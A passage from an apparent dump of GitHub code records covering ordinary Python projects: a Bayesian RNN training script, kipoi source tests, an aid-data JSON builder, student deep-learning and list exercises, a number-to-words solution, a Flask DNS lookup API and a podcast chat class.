self).__init__(weight, batch_axis, **kwargs)\n self.prior = prior\n self.var_posterior = var_posterior\n self.log_likelihood = log_likelihood\n self.num_batches = num_batches\n return\n def forward(self, yhat, y, sampled_params, sample_weight=None):\n neg_log_likelihood = mx.nd.sum(self.log_likelihood(yhat, y))\n prior_log_prob = mx.nd.sum(self.prior.log_prob(sampled_params))\n var_post_log_prob = mx.nd.sum(self.var_posterior.log_prob(sampled_params))\n kl_loss = var_post_log_prob - prior_log_prob\n var_loss = neg_log_likelihood + kl_loss / self.num_batches\n return var_loss, neg_log_likelihood\n\ndef train_bbb(model):\n global args_lr\n global args_ess_multiplier\n best_val = float(\"Inf\")\n for epoch in range(args_epochs):\n total_L = 0.0\n start_time = time.time()\n hidden = model.begin_state(func = mx.nd.zeros, batch_size = args_batch_size, ctx = context)\n for ibatch, i in enumerate(range(0, train_data.shape[0] - 1, args_bptt)):\n x, y = get_batch(train_data, i)\n hidden = detach(hidden)\n with autograd.record():\n sampled_params = var_posterior.sample_model_params()\n model.set_params_to(sampled_params)\n yhat, hidden = model(x, hidden)\n var_loss, L = bbb_loss(yhat, y, sampled_params)\n var_loss.backward()\n grads = [var_mu.grad(context) for var_mu in var_posterior.var_mus]\n effective_batch_size = (args_bptt * args_batch_size) + (var_posterior.num_params() / num_batches)\n gluon.utils.clip_global_norm(grads, args_clip * effective_batch_size)\n trainer.step(args_clip * effective_batch_size)\n total_L += mx.nd.sum(L).asscalar()\n if ibatch % args_log_interval == 0 and ibatch > 0:\n cur_L = total_L / args_bptt / args_batch_size / args_log_interval\n print('[Epoch %d Batch %d] loss %.2f, perplexity %.2f' % (\n epoch + 1, ibatch, cur_L, math.exp(cur_L)))\n total_L = 0.0\n model.set_params_to(var_posterior.raw_var_mus)\n val_L = evaluate(val_data, model)\n print('[Epoch %d] time cost %.2fs, validation loss %.2f, validation perplexity %.2f' % (\n epoch + 1, time.time() - start_time, val_L, math.exp(val_L)))\n if val_L < best_val:\n best_val = val_L\n model.set_params_to(var_posterior.raw_var_mus)\n test_L = evaluate(test_data, model)\n model.save_params(args_save)\n print('test loss %.2f, test perplexity %.2f' % (test_L, math.exp(test_L)))\n else:\n args_lr = args_lr * 0.25\n trainer._init_optimizer('sgd', {'learning_rate': args_lr, 'momentum': 0, 'wd': 0})\n model.load_params(args_save, context)\n return\n\nbbb_model = RNNModel(args_model, ntokens, args_emsize, args_nhid, args_nlayers, dropout=0.0, tie_weights=args_tied)\nbbb_model.collect_params().initialize(mx.init.Xavier(), ctx=context)\nprior = ScaleMixturePrior(alpha = 0.75, sigma1 = 0.001, sigma2 = 0.75)\nvar_posterior = VariationalPosterior(bbb_model, var_mu_init_scale = 0.05, var_sigma_init_scale = 0.01)\nbbb_loss = BBB_Loss(prior, var_posterior, gluon.loss.SoftmaxCrossEntropyLoss(), num_batches)\ntrainer = gluon.Trainer(var_posterior.var_params, 'sgd',\n { 'learning_rate': args_lr, 'momentum': 0, 'wd': 0 })\n\ntrain_bbb(bbb_model)\nbbb_model.load_params(args_save, context)\nbbb_model.set_params_to(var_posterior.raw_var_mus)\ntest_L = evaluate(test_data, bbb_model)\nprint('Best test loss %.2f, test perplexity %.2f'%(test_L, math.exp(test_L)))","repo_name":"zhaojinxi/learn_python","sub_path":"learn_mxnet/Part 3 Advanced Topics/Variational methods/Bayes by Backprop for Recurrent Neural Networks (RNNs).py","file_name":"Bayes by Backprop for Recurrent Neural Networks (RNNs).py","file_ext":"py","file_size_in_byte":15324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70675462865","text":"\"\"\"test: kipoi test-source\n\"\"\"\nimport numpy as np\nimport pytest\nimport sys\nimport subprocess as sp\nfrom kipoi.cli.source_test import modified_files\nfrom kipoi.sources import list_softlink_dependencies, LocalSource\nimport kipoi\nimport os\n\ndef test_singularity_non_kipoi_src_fail():\n returncode = sp.call([\"python\", os.path.abspath(\"./kipoi/__main__.py\"),\n \"test-source\",\n \"dir\",\n \"--all\",\n \"-x\",\n \"--singularity\"]\n )\n\n assert returncode == 1\n\ndef test_singularity_commonenv_together_fail():\n returncode = sp.call([\"python\", os.path.abspath(\"./kipoi/__main__.py\"),\n \"test-source\",\n \"kipoi\",\n \"--all\",\n \"-x\",\n \"--singularity\",\n \"--common_env\"]\n )\n\n assert returncode == 1\n\n\ndef test_list_softlink_dependencies():\n \"\"\"Test if finding model dependencies works\n \"\"\"\n component_dir = kipoi.get_source(\"kipoi\").local_path\n deps = list_softlink_dependencies(os.path.join(component_dir, 'HAL'),\n component_dir)\n # one of these two, depending on the model source\n assert (deps == {'MaxEntScan'}) or (deps == {'MaxEntScan/template',\n 'MaxEntScan/template/example_files',\n 'labranchor/example_files'})\n assert list_softlink_dependencies(os.path.join(component_dir, 'deepTarget'),\n component_dir) == set()\n\n\ndef dont_test_diff():\n git_range = [\"master\", \"HEAD\"]\n local_path = \"/home/avsec/.kipoi/models\"\n modified_files([\"master\", \"HEAD\"], \"/home/avsec/.kipoi/models\", relative=True)\n\n sp.call(['git', 'diff', '--relative=/home/avsec/.kipoi/models',\n '--name-only', 'master...HEAD',\n '--', '/home/avsec/.kipoi/models/*', '/home/avsec/.kipoi/models/*/*'])\n\n\ndef test_single_model_dry():\n # Dry run\n returncode = sp.call([\"python\", os.path.abspath(\"./kipoi/__main__.py\"),\n \"test-source\",\n \"kipoi\",\n \"--git-range\", \"master\", \"HEAD\",\n \"-n\"])\n\n assert returncode == 0\n\n\ndef test_single_model():\n MODEL = \"HAL\"\n try:\n proc = sp.Popen([\"python\", os.path.abspath(\"./kipoi/__main__.py\"), \"test-source\",\n \"kipoi\",\n \"--git-range\", \"master\", \"HEAD\",\n \"--all\",\n \"-x\",\n \"-c\",\n f\"-k {MODEL}\"], stdout=sp.PIPE, stderr=sp.PIPE)\n proc.wait()\n stdout, stderr = proc.communicate()\n except sp.CalledProcessError as err:\n print(f\"Error: {err.stderr}\")\n\ndef test_single_model_singularity():\n MODEL = \"epidermal_basset\"\n try:\n proc = sp.Popen([\"python\", os.path.abspath(\"./kipoi/__main__.py\"), \"test-source\",\n \"kipoi\",\n \"--all\",\n \"-x\",\n \"--singularity\",\n f\"-k {MODEL}\"], stdout=sp.PIPE, stderr=sp.PIPE)\n proc.wait()\n stdout, stderr = proc.communicate()\n except sp.CalledProcessError as err:\n print(f\"Error: {err.stderr}\")\n\n\n@pytest.fixture\ndef source():\n source_dir = 'example/models'\n return LocalSource(source_dir)\n\n\n# source = source() # TODO - remove\n\n# MODEL = 'multiple_models'\n\n\ndef test_list_components(source):\n # 1. list\n # 2. get each model\n # 3. check that the arguments were set correctly (doc as well as the resize len)\n # 4. check that the made prediction is correct\n\n # 1. instantiate the source\n ls = source._list_components(\"model\")\n\n # standard models\n assert 'pyt' in ls\n\n # group models\n assert 'multiple_models/model1' in ls\n assert 'multiple_models/submodel/model2' in ls\n\n # dataloader\n ls = source._list_components(\"dataloader\")\n\n # standard models\n assert 'pyt' in ls\n\n # group dataloader - not present\n assert 'multiple_models/model1' not in ls\n assert 'multiple_models/submodel/model2' not in ls\n\n\ndef test_is_component(source):\n # _is_component\n assert source._is_component(\"pyt\", 'model')\n assert source._is_component(\"pyt\", 'dataloader')\n\n assert not source._is_component(\"multiple_models\", 'model') \n assert not source._is_component(\"multiple_models\", 'dataloader')\n\n assert source._is_component(\"multiple_models/model1\", 'model')\n assert not source._is_component(\"multiple_models/model1\", 'dataloader')\n\n assert not source._is_component(\"multiple_models\", 'model') \n assert not source._is_component(\"multiple_models\", 'dataloader')\n\n assert source._is_component(\"multiple_models/submodel/model2\", 'model')\n assert not source._is_component(\"multiple_models/submodel/model2\", 'dataloader')\n\n\ndef test_pull_component(source):\n assert source._get_component_dir(\"pyt\", 'model') == os.path.join(source.local_path, \"pyt\")\n assert source._get_component_dir(\"pyt\", 'dataloader') == os.path.join(source.local_path, \"pyt\")\n\n # group component\n assert source._get_component_dir(\"multiple_models/model1\", 'model') == os.path.join(source.local_path,\n \"multiple_models\")\n with pytest.raises(ValueError):\n source._get_component_dir(\"multiple_models/model1\", 'dataloader') is None\n\n assert source._get_component_dir(\"multiple_models/submodel/model2\", 'model') == \\\n os.path.join(source.local_path, \"multiple_models\")\n\n\ndef test_get_component_descr(source):\n assert source._get_component_descr(\"pyt\", 'model').info.doc # model has some description\n assert source._get_component_descr(\"pyt\", 'dataloader').info.doc # dataloader has some description\n\n # test overriding\n assert source._get_component_descr(\"multiple_models/model1\", 'model').info.doc == \"model returning one\"\n assert source._get_component_descr(\"multiple_models/submodel/model2\", 'model').info.doc == \"model returning two\"\n\n # test placeholders\n assert source._get_component_descr(\"multiple_models/model1\", 'model').schema.inputs.doc == \"sequence one\"\n assert source._get_component_descr(\"multiple_models/submodel/model2\", 'model').schema.inputs.doc == \"sequence two\"\n\n\ndef test_get_model(source):\n # model correctly instentiated\n assert kipoi.get_dataloader_factory(\"pyt\", source).info.doc\n assert kipoi.get_model(\"pyt\", source).info.doc\n\n assert kipoi.get_model(\"multiple_models/model1\", source).dummy_add == 1\n assert kipoi.get_model(\"multiple_models/submodel/model2\", source).dummy_add == 2\n\n # model examples correctly performed\n m = kipoi.get_model(\"multiple_models/model1\", source)\n assert np.all(m.pipeline.predict_example() == 1)\n\n m = kipoi.get_model(\"multiple_models/submodel/model2\", source)\n assert np.all(m.pipeline.predict_example() == 2)\n\n\ndef test_list_models(source):\n df = source.list_models()\n assert \"pyt\" in list(df.model)\n assert \"multiple_models\" not in list(df.model)\n assert \"multiple_models/model1\" in list(df.model)\n assert \"multiple_models/submodel/model2\" in list(df.model)\n\n\ndef test_loading_target(source):\n # tests that the column names\n # were loaded correctly\n md = kipoi.get_model_descr(\"Basset\")\n assert len(md.schema.targets.column_labels) > 1\n","repo_name":"kipoi/kipoi","sub_path":"tests/test_22_kipoi_test_source.py","file_name":"test_22_kipoi_test_source.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"48"} +{"seq_id":"32410761996","text":"import pandas as pd\nimport json\nfrom pprint import pprint\nimport random\n\nwith open('country_profiles.json') as data_file:\n dataset = json.load(data_file)\n\ndata = dataset['data']\n\n# Load recommendations\nrecs = pd.read_csv('recommendations.csv')\nrecs = recs.fillna('')\nrecs_dict = recs.groupby(['profile']).apply(lambda x: x.to_dict(orient='record')).to_dict()\n\n# Load annotations\njs = open('annotations.json', encoding='utf-8').read()\nannotations = json.loads(js)\n\n# Get country names\ncountries = data.keys()\n\nnested_data = {}\nnested_data['data_one'] = {}\n\nfor c in countries:\n print(c)\n print('--------------------')\n obj = {}\n\n # Create dataframe from country dict\n df = pd.DataFrame(data[c])\n\n # Group by data type (current / constant / currency values)\n grouped_by_dataType = list(df.groupby('Data_type'))\n\n\n datatype_dict = {}\n for x in grouped_by_dataType:\n\n datatype_obj = {}\n arr = []\n\n # Group by year\n grouped_by_year = list(x[1].groupby('Time_Period'))\n\n for y in grouped_by_year:\n # Create and populate dict for every country/datatype/year\n adict = dict(zip(y[1]['Metric'].values, y[1]['Value'].values))\n adict[\"Time_Period\"] = int(y[0])\n\n # pprint(adict)\n\n # Select variables\n keys = [\n 'All_ODA_Over_GNI',\n 'LDC_ODA_Over_All_ODA',\n 'Africa_ODA_Over_All_ODA',\n 'In_Donor_Refugee_Over_All_ODA',\n 'Debt_Relief_Over_All_ODA',\n 'All_ODA',\n 'LDC_ODA',\n 'Africa_ODA',\n 'In_Donor_Refugee_Costs',\n 'Debt_Relief',\n 'All_ODA_YoY_Percent',\n 'LDC_ODA_YoY_Percent',\n 'Africa_ODA_YoY_Percent',\n 'In_Donor_Refugee_YoY_Percent',\n 'Time_Period'\n ]\n\n # Check if variable is in keys, otherwise generate random value\n for k in keys:\n if k not in adict.keys():\n adict[k] = \"None\"\n print(k + ' is not in ' + c)\n print('***************************************************')\n\n # Filter out the variables and create new dict\n adict = dict(zip(keys, [adict[k] for k in keys]))\n pprint(adict)\n\n # Create percenatges of LDC, Africa and in-donor against ODA/GNI\n # adict['LDC_ODA_Over_All_ODA_Over_GNI'] = adict['LDC_ODA_Over_All_ODA'] * adict['All_ODA_Over_GNI']\n # adict['Africa_ODA_Over_All_ODA_Over_GNI'] = adict['Africa_ODA_Over_All_ODA'] * adict['All_ODA_Over_GNI']\n # adict['In_Donor_Refugee_Over_GNI'] = adict['In_Donor_Refugee_Over_All_ODA'] * adict['All_ODA_Over_GNI']\n\n\n # Append dict to array\n arr.append(adict)\n\n # Insert array in data type dict\n datatype_obj[x[0]] = arr\n\n datatype_dict[x[0]] = datatype_obj[x[0]]\n\n obj[c] = datatype_dict\n nested_data['data_one'][c] = obj[c]\n\n # Add recommendations for each country\n nested_data['data_one'][c]['recommendations'] = recs_dict[c]\n\n\n# Create dummy annotations\nnested_data[\"annotations\"] = annotations['annotations']\n# languages = ['english', 'german', 'french']\n#\n# for l in languages:\n# nested_data[\"annotations\"][l] = {}\n# nested_data[\"annotations\"][l]['selector_page'] = {\n# \"title\": \"Country profiles\",\n# \"intro_line\": \"This is an intro line\",\n# \"instructions\": \"Click on a country to find out more\",\n# \"legend_target_met\": \"ODA / GNI target met\",\n# \"legend_target_not_met\": \"ODA / GNI target not met\"\n# }\n# nested_data[\"annotations\"][l]['country_profile_page'] = {\n# \"country_name\": \"Country Name\",\n# \"context_chart_title\": \"Aid over time\",\n# \"context_chart_selector\": \"Show proportion of aid going to:\",\n# \"context_chart_button_1\": \"LDC\",\n# \"context_chart_button_2\": \"AFRICA\",\n# \"context_chart_button_3\": \"IN-DONOR\",\n# \"target_chart_title\": \"Targets\",\n# \"target_chart_met\": \"Target met\",\n# \"target_chart_not_met\": \"Target not met\",\n# \"key_stats_table_title\": \"Key statistics\",\n# \"key_stats_table_local_currency\": \"GBP\",\n# \"key_stats_table_row_1_title\": \"Global\",\n# \"key_stats_table_row_2_title\": \"ODA to LDCs\",\n# \"key_stats_table_row_3_title\": \"ODA to Africa\",\n# \"recommendations_title\": \"Recommendations\",\n# \"recommendations_1\": \"This is a sample recommendation 1\",\n# \"recommendations_2\": \"This is a sample recommendation 2\"\n# }\n#\n# # Country specific variables\n# nested_data[\"annotations\"][l]['country_profile_page']['currencies'] = {\n# \"Australia\": \"AUD\",\n# \"Canada\": \"CAD\",\n# \"EU member states\": \"EUR\",\n# \"EU member institutions\": \"EUR\",\n# \"France\": \"EUR\",\n# \"Germany\": \"EUR\",\n# \"Italy\": \"EUR\",\n# \"Japan\": \"JPY\",\n# \"Netherlands\": \"EUR\",\n# \"Sweden\": \"SEK\",\n# \"United Kingdom\": \"GBP\",\n# \"United States\": \"USD\",\n# }\n#\n# nested_data[\"annotations\"][l]['country_profile_page']['country_names'] = {\n# \"Australia\": \"Australia\",\n# \"Canada\": \"Canada\",\n# \"EU Countries\": \"EU member states\",\n# \"EU Institutions\": \"EU member institutions\",\n# \"France\": \"France\",\n# \"Germany\": \"Germany\",\n# \"Italy\": \"Italy\",\n# \"Japan\": \"Japan\",\n# \"Netherlands\": \"Netherlands\",\n# \"Sweden\": \"Sweden\",\n# \"United Kingdom\": \"United Kingdom\",\n# \"United States\": \"United States\",\n# }\n#\n# pprint(nested_data[\"annotations\"] )\n#\nwith open('country_profiles_nested_v5.json', 'w') as outfile:\n json.dump(nested_data, outfile, indent=4, separators=(',', ': '), ensure_ascii=False)\n","repo_name":"kate-one/DATA_Report_2017","sub_path":"data_report_viz/nest.py","file_name":"nest.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23707428466","text":"import tensorflow as tf\n\n# Lataa Fashion MNIST datasetti ajamalla tehtävän ensimmäinen solu.\n(train_X, train_y), (test_X, test_y) = tf.keras.datasets.fashion_mnist.load_data()\n\n#%%\n# Luo alla olevan kuvan mukainen neuroverkkomalli.\nmodel_cnn = tf.keras.Sequential([ \n tf.keras.layers.InputLayer((28,28,1)),\n #tf.keras.layers.Dense(1, input_shape=(28,28,1), activation='relu'), # Tarvittava neuronien määrä nähdään kuvasta \"output\" - kentästä\n #tf.keras.Input(shape=(28,28,1)),\n tf.keras.layers.Conv2D(24, kernel_size=(5,5), activation='relu', strides=1, padding='same'),\n tf.keras.layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Conv2D(48, kernel_size=(5,5), activation='relu', strides=1, padding='same'),\n tf.keras.layers.Dropout(0.4),\n tf.keras.layers.Conv2D(64, kernel_size=(5,5), activation='relu', strides=1, padding='same'),\n tf.keras.layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n tf.keras.layers.Flatten(), \n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(10)\n])\n# Lataa malliin painoarvot \"weights.h5\" tiedostosta.\nmodel_cnn.load_weights('weights.h5')\n# Tehtävän toteutus tähän\n#%%\n#train_X = train_X.reshape((train_X.shape[0],28,28,1))\n#test_X = test_X.reshape((train_X.shape[0],28,28,1))\nprint(train_X.shape)\n# Poista äskeisessä tehtävässä luodusta mallista klassifikaatiokerrokset. (eli Flatten ja kaikki sen jälkeiset kerrokset)\n\nmodel_cnn2 = tf.keras.Model(inputs = model_cnn.input,\n outputs = model_cnn.output)\n#model_cnn2 = model_cnn\nmodel_cnn2 = model_cnn2.Layer.call(input_shape=(32,32,3), include_top=False)\n#model_cnn2.summary()\n\n\n# Jäädytä loput kerrokset.\nfor layer in model_cnn2.layers:\n layer.trainable = False\n #model_cnn2.layers.remove(layer) \n #layer.pop()\n \nmodel_cnn2.summary()\n\n# Luo klassifikaatiokerrokset ja lisää ne malliin.\nflatten = tf.keras.layers.Flatten()(model_cnn2.output)\nnew_dense1 = tf.keras.layers.Dense(256,activation='relu')(flatten)\nnew_output = tf.keras.layers.Dense(10,activation='softmax')(new_dense1)\n# tehdään uusi malli olio\nmodel_cnn3 = tf.keras.Model(inputs = model_cnn2.input,\n outputs = model_cnn2.output)\n #outputs = new_output)\n#model_cnn3.summary()\n\n\n#%%\n# Kouluta mallia Fashion MNIST datasetillä muutama kierros (epoch) käyttäen train_X ja train_y koulutusdataa.\n#model_cnn3.compile(optimizer='adam',loss='mean_squared_error',metrics=['mean_squared_error'])\n#model_cnn3.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['mean_squared_error'])\nmodel_cnn3.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n\nmodel_cnn3.fit(train_X, train_y, epochs=4, batch_size=5)\n#model_cnn3.fit(train_X, train_y, validation_data=(test_X, test_y), epochs=4, batch_size=2)\n\n\n#model_cnn3.fit(test_X, test_y,epochs=5,verbose=0)\nresults = model_cnn2.predict(test_X)\n\n# Aja tehtävän viimeinen \"Vastaukset\" solu.\n#%%\n# Tehtävän vastaukset. Huom! Älä muokkaa tätä solua, vaan aja se, kun olet suorittanut tehtävän. Sijoita results - muuttujaan funktion model.evaluate() tulos.\n# Muista määrittää model.compile() - funktioon seurattavaksi suureeksi metrics=['accuracy'], jotta näät, kuinka suuri osa neuroverkon ennustuksista on oikein.\nprint(f\"Test Loss:{results[0]} Test Accuracy:{results[1]*100}%\")","repo_name":"TapaniAlastalo/data_analytics","sub_path":"syvaoppiminen/koodit/osa2/t4b.py","file_name":"t4b.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1170683715","text":"FIRST_TEN = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\",\n \"eight\", \"nine\"]\nSECOND_TEN = [\"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\nOTHER_TENS = [\"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\",\n \"eighty\", \"ninety\"]\nHUNDRED = \"hundred\"\n\n#Your code here\n#You can import some modules or create additional functions\n\n\ndef checkio(number):\n #Your code here\n #It's main function. Don't remove this function\n #It's using for auto-testing and must return a result for check.\n d1 = {'0':'', '1':'one', '2':'two', '3':'three', '4':'four', '5':'five', '6':'six', '7':'seven', '8':'eight', '9':'nine', '10':'ten', '11':'eleven', '12':'twelve', '13':'thirteen', '14':'fourteen', '15':'fifteen', '16':'sixteen', '17':'seventeen', '18':'eighteen', '19':'nineteen'}\n d2 = {'2':'twenty', '3':'thirty', '4':'forty', '5':'fifty', '6':'sixty', '7':'seventy', '8':'eighty', '9':'ninety'}\n\n data = number\n string = ''\n hun = data/100\n remind = data%100\n if hun >= 1:\n string += d1[str(hun)] + ' hundred '\n tenth = remind/10\n if tenth >= 2:\n string += d2[str(tenth)]\n remind = remind%10\n if remind > 0:\n string += ' ' + d1[str(remind)]\n else:\n string += d1[str(remind)]\n #replace this for solution\n# return 'string representation of n'\n string = string.strip()\n return string\n#Some hints\n#Don't forget strip whitespaces at the end of string\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(4) == 'four', \"1st example\"\n assert checkio(133) == 'one hundred thirty three', \"2nd example\"\n assert checkio(12) == 'twelve', \"3rd example\"\n assert checkio(101) == 'one hundred one', \"4th example\"\n assert checkio(212) == 'two hundred twelve', \"5th example\"\n assert checkio(40) == 'forty', \"6th example\"\n","repo_name":"liuminzhao/checkio","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22462531435","text":"from flask import make_response\nfrom utils.resolver import resolve_host\nfrom utils.domains import Domain\nimport re\n\ndomains = {}\ncustom_domains = {}\nDOMAIN_VALIDATION_RE = r'(([\\da-zA-Z])([_\\w-]{,62})\\.){,127}(([\\da-zA-Z])[_\\w-]{,61})?([\\da-zA-Z]\\.((xn\\-\\-[a-zA-Z\\d]+)|([a-zA-Z\\d]{2,})))'\nIP_VALIDATION_RE = r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\"\n\ndef check_custom_domain_kw(required, **kwargs):\n \"\"\"\n Checks Domain and IP are present in the kwargs\n \"\"\"\n print(f\"Los kw son {kwargs}\")\n for req in required:\n if req not in kwargs:\n return False\n return True\n\n\ndef resolve_and_store(domain):\n ttl, addrs = resolve_host(domain)\n if addrs:\n new = Domain(domain=domain, addrs=addrs, ttl=ttl, custom=False)\n domains[domain] = new\n return new\n else:\n return None\n\n\ndef obtener_dominio(domain):\n \"\"\"\n Maneja el `/api/domains/`\n \"\"\"\n if domain in custom_domains:\n print(\"Existe el dominio custom\")\n return make_response(custom_domains[domain].as_dict(), 200)\n elif domain in domains:\n print(\"Existe el dominio\")\n obj = domains[domain]\n if not obj.expired:\n return make_response(obj.as_dict(), 200)\n\n\n # Ese bloque se ejecuta si no se encontró el dominio, o se encontró y se encuentra expirado\n # Intento resolverlo\n print(f\"Intento resolver dominio {domain}\")\n if not re.match(DOMAIN_VALIDATION_RE,domain):\n print(\"Error en el formato del dominio\")\n return make_response({'error': \"Invalid format for domain\"}, 400)\n try:\n new = resolve_and_store(domain)\n if not new:\n # No se pudo resolver\n return make_response({'error': \"domain not found\"}, 404)\n except Exception as e:\n return make_response({'error': \"Exception while resolving query for domain name (%s)\" % str(e) }, 400)\n return make_response(new.as_dict(), 200)\n\n\ndef create_custom_domain(**kwargs):\n body = kwargs.get('body')\n if not check_custom_domain_kw(required=('domain', 'ip'), **body):\n return make_response({'error': 'Missing data'}, 400)\n domain = body.get('domain')\n ip = body.get('ip')\n if not re.match(IP_VALIDATION_RE,ip):\n print(\"Error en el formato de la IP\")\n return make_response({'error': \"Invalid Format for IP Address (field 'ip')\"}, 400)\n\n if domain in custom_domains:\n return make_response({'error': 'custom domain already exists'}, 400)\n\n obj = Domain(domain=domain, addrs=[ip], custom=True, ttl=0)\n custom_domains[domain] = obj\n\n return make_response(obj.as_dict(), 201)\n\n\ndef modify_custom_domain(**kwargs):\n body = kwargs.get('body')\n domain = kwargs.get('domain')\n if not check_custom_domain_kw(required=('ip',), **body) or \\\n not re.match(IP_VALIDATION_RE, body.get('ip')):\n return make_response({'error': 'payload is invalid'}, 400)\n\n ip = body.get('ip')\n if domain not in custom_domains:\n return make_response({'error': 'domain not found'}, 404)\n\n obj = Domain(domain=domain, addrs=[ip], custom=True, ttl=0)\n custom_domains[domain] = obj\n\n return make_response(obj.as_dict(), 200)\n\n\ndef delete_custom_domain(domain):\n print (\"Domain: %s\" % domain)\n if domain not in custom_domains:\n return make_response({'error': 'domain not found'}, 404)\n\n custom_domains.pop(domain)\n return make_response({'domain': domain}, 200)\n\n\ndef query_domains(q):\n items = []\n for domain, obj in custom_domains.items():\n if q in domain:\n items.append(obj)\n\n response = {'items': [d.as_dict() for d in items]}\n return make_response(response, 200)\n","repo_name":"aleperno/distro-tp1-doh","sub_path":"api/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74232251666","text":"import datetime\nimport time\n\nimport datasets\n\nfrom src.inf_server import call_inf_server\n\n\n# download podcast database\nds_episodes = datasets.load_dataset(\"dfurman/All-In-Podcast-Transcripts\")\n# download cache conversation databse\n# ds_conversations = datasets.load_dataset(\"dfurman/Chat-All-In-Conversations\")\n\n\nclass Chat:\n default_system_prompt = \"A conversation between a user and an LLM-based AI assistant. The assistant gives helpful and honest answers.\"\n system_format = \"<|im_start|>system\\n{}<|im_end|>\\n\"\n\n def __init__(\n self, system: str = None, user: str = None, assistant: str = None\n ) -> None:\n if system is not None:\n self.set_system_prompt(system)\n else:\n self.reset_system_prompt()\n self.user = user if user else \"<|im_start|>user\\n{}<|im_end|>\\n\"\n self.assistant = (\n assistant if assistant else \"<|im_start|>assistant\\n{}<|im_end|>\\n\"\n )\n self.response_prefix = self.assistant.split(\"{}\")[0]\n\n def set_system_prompt(self, system_prompt):\n # self.system = self.system_format.format(system_prompt)\n return system_prompt\n\n def reset_system_prompt(self):\n return self.set_system_prompt(self.default_system_prompt)\n\n def history_as_formatted_str(self, system, history) -> str:\n system = self.system_format.format(system)\n text = system + \"\".join(\n [\n \"\\n\".join(\n [\n self.user.format(item[0]),\n self.assistant.format(item[1]),\n ]\n )\n for item in history[:-1]\n ]\n )\n text += self.user.format(history[-1][0])\n text += self.response_prefix\n\n # stopgap solution to too long sequences\n if len(text) > 4500:\n # delete from the middle between <|im_start|> and <|im_end|>\n # find the middle ones, then expand out\n start = text.find(\"<|im_start|>\", 139)\n end = text.find(\"<|im_end|>\", 139)\n while end < len(text) and len(text) > 4500:\n end = text.find(\"<|im_end|>\", end + 1)\n text = text[:start] + text[end + 1 :]\n if len(text) > 4500:\n # the nice way didn't work, just truncate\n # deleting the beginning\n text = text[-4500:]\n\n return text\n\n def clear_history(self, history):\n return []\n\n # def save_history(self, history):\n # Getting the current date and time\n # dt = datetime.now()\n # dt = str(dt).replace(\" \", \"-\").replace(\":\", \"-\").replace(\".\", \"-\")\n # return history\n\n def turn(self, user_input: str):\n self.user_turn(user_input)\n return self.bot_turn()\n\n def user_turn(self, user_input: str, history):\n history.append([user_input, \"\"])\n return user_input, history\n\n def bot_turn(self, system, history, openai_key, episode):\n episode_num = episode.split(\"(\")[-1].split(\")\")[0]\n conversation = self.history_as_formatted_str(system, history)\n assistant_response = call_inf_server(conversation, openai_key, episode_num)\n history[-1][1] = \"\"\n for chunk in assistant_response:\n try:\n decoded_output = chunk[\"choices\"][0][\"delta\"][\"content\"]\n history[-1][1] += decoded_output\n yield history\n except KeyError:\n pass\n\n def user_turn_select_episode(self, history):\n user_input = \"Special starter call: Display background information for the selected episode.\"\n history.append([user_input, \"\"])\n return history\n\n def bot_turn_select_episode(self, history, episode):\n episode_num = episode.split(\"(\")[-1].split(\")\")[0]\n assistant_response = f\"All-In Episode {episode_num}:\\n\\n\"\n assistant_response += f'Title: {ds_episodes[episode_num][\"episode_title\"][0].replace(episode_num + \": \", \"\")}\\n'\n assistant_response += (\n f\"Date aired: {ds_episodes[episode_num]['episode_date'][0]}\\n\"\n )\n assistant_response += \"Sections:\\n\\n\"\n for itr, section_title in enumerate(ds_episodes[episode_num][\"section_title\"]):\n assistant_response += f\"{itr+1}. {section_title} ({ds_episodes[episode_num]['section_time_stamp'][itr]})\\n\"\n assistant_response += \"\\nYou can now converse with the assistant about this episode! Ask questions about one section at a time. Try prompts like:\\n- Summarize section 1\\n- Tell me more info about [insert topic]\\n- What were the key points on [insert topic]\"\n\n history[-1][1] = \"\"\n for character in assistant_response:\n history[-1][1] += character\n time.sleep(0.000075)\n yield history\n","repo_name":"daniel-furman/chat-all-in","sub_path":"src/chat_class.py","file_name":"chat_class.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"38558299842","text":"#1. Izveidot masīvu, kas satur skaitļus no 1 līdz 10. Izvadīt masīvu uz ekrāna.\n\na=[1,2,3,4,5,6,7,8,9,10]\n\nfor i in range(len(a)):\n print(a[i], end=' ')\nprint()\n\n#2. Izveidot masīvu no dažādiem skaitļiem. Izmantojot ciklu un funkciju pop(), dzēst masīva pēdējos 4 elementus.\n\nfor i in range(4):\n a.pop()\n\nfor i in range(len(a)):\n print(a[i], end=' ')\nprint()\n\n#3. Izmantojot count() un remove(), dzēst visus pieciniekus no masīva.\n\nb = [1,2,5,2,5,8,5,5,9]\n\nfor i in range(b.count(5)):\n b.remove(5)\n\nwhile 